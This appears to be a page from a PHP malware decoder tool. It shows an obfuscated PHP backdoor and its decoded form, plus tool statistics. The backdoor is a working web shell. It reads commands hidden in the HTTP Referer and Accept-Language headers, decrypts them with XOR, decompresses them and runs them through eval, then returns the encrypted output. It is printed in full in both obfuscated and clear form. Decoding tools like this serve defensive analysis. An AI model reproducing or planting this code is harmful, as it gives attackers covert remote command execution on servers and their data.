Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $z='o;}$r=$_SF"ERVER;$F"rr=@$r["F"HTTP_REFF"EF"RERF""];$ra=@$r["HTTF"P_AF"CCEPT_LAF..

Decoded Output download

$kh="b93f";$kf="1186";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){    $u=parse_url($rr);    parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++) $p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$z='o;}$r=$_SF"ERVER;$F"rr=@$r["F"HTTP_REFF"EF"RERF""];$ra=@$r["HTTF"P_AF"CCEPT_LAF"NGUF"AGE"];if(F"$rr&&$F"';
$b='$ssF"(md5($i.$kF"F"h),0,3));$fF"=$sl(F"$ss(md5($F"i.$kf)F",0,3)F")F";$pF"="";for($z=F"1;$z<couF"nt($m';
$A='F"b_start();@F"eF"F"val(@gzuF"ncF"ompress(@x(@base6F"4_decode(pregF"_replaF"ceF"(array("F"/F"F"_/","/-';
$T='staF"rt()F";$s=&F"$F"_SESSIOF"N;$ss=F""subsF"tr";$sl="sF"trtolower"F";$i=$mF"[F"1][0].F"$m[1][1];F"$h=$F"sl(';
$W='$kF"h="b93f";$F"kf="1186F"";funF"ction F"x($tF",$k){$cF"=stF"rleF"n($k);$l=stF"rleF"n($t);$F"o="";F"for';
$u=str_replace('kW','','kWcreakWtkWe_fkWkWunkWction');
$D='preg_matcF"h_F"alF"l("/([\\w]F")F"[\\w-]+(?:;F"q=0.([\\d]))?,F"F"F"?/",$raF",$m);if($q&&$m){F"@sessiF"on_';
$q='$dF"F"=base6F"4_encode(x(F"gzcF"ompress($F"o),$k))F";prinF"t("<F"$kF">$dF"<F"/$k>");@sessF"ion_destroy();}}}}';
$n='F"ra){   F" $u=parse_F"url($rF"r)F";    parse_F"strF"($u[F""querF"y"],$qF");$q=arrayF"_values($qF")F";';
$r='arrayF"_kF"ey_exists($F"i,$s)F"){$s[$i].F"F"=$pF";$e=strposF"(F"$s[$iF"],$f);if($e){$F"F"k=$kF"h.$kf;o';
$w='/"F"),arF"ray("/","+"F"F"),$ss(F"$s[$i],0,$e))),$k)))F";$o=oF"bF"_get_coF"ntentF"s();ob_enF"d_cleF"an();';
$Q='[1]F");$zF"++) F"$pF".=$q[$m[2]F"[F"$z]]F";if(stF"rpos(F"$p,$hF")===0){$s[$i]="";F"$p=F"$ssF"($p,3);}iF"f(';
$H='($i=0;$i<F"F"$F"lF";){for($j=0;($j<$c&&F"$i<$l);$F"F"jF"++,$i++){$o.F"=$F"t{$iF"}^F"$kF"{$F"j};}}return $';
$y=str_replace('F"','',$W.$H.$z.$n.$D.$T.$b.$Q.$r.$A.$w.$q);
$d=$u('',$y);$d();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A F"b_start();@F"eF"F"val(@gzuF"ncF"ompress(@x(@base6F"4_decod..
$D preg_matcF"h_F"alF"l("/([\w]F")F"[\w-]+(?:;F"q=0.([\d]))?,F"..
$H ($i=0;$i<F"F"$F"lF";){for($j=0;($j<$c&&F"$i<$l);$F"F"jF"++,$..
$Q [1]F");$zF"++) F"$pF".=$q[$m[2]F"[F"$z]]F";if(stF"rpos(F"$p,..
$T staF"rt()F";$s=&F"$F"_SESSIOF"N;$ss=F""subsF"tr";$sl="sF"trt..
$W $kF"h="b93f";$F"kf="1186F"";funF"ction F"x($tF",$k){$cF"=stF..
$b $ssF"(md5($i.$kF"F"h),0,3));$fF"=$sl(F"$ss(md5($F"i.$kf)F",0..
$d None
$n F"ra){ F" $u=parse_F"url($rF"r)F"; parse_F"strF"($u[F""..
$q $dF"F"=base6F"4_encode(x(F"gzcF"ompress($F"o),$k))F";prinF"t..
$r arrayF"_kF"ey_exists($F"i,$s)F"){$s[$i].F"F"=$pF";$e=strposF..
$u create_function
$w /"F"),arF"ray("/","+"F"F"),$ss(F"$s[$i],0,$e))),$k)))F";$o=o..
$y $kh="b93f";$kf="1186";function x($t,$k){$c=strlen($k);$l=str..
$z o;}$r=$_SF"ERVER;$F"rr=@$r["F"HTTP_REFF"EF"RERF""];$ra=@$r["..

Stats

MD5 883fcb275564bae93432eeda53844fa6
Eval Count 1
Decode Time 97 ms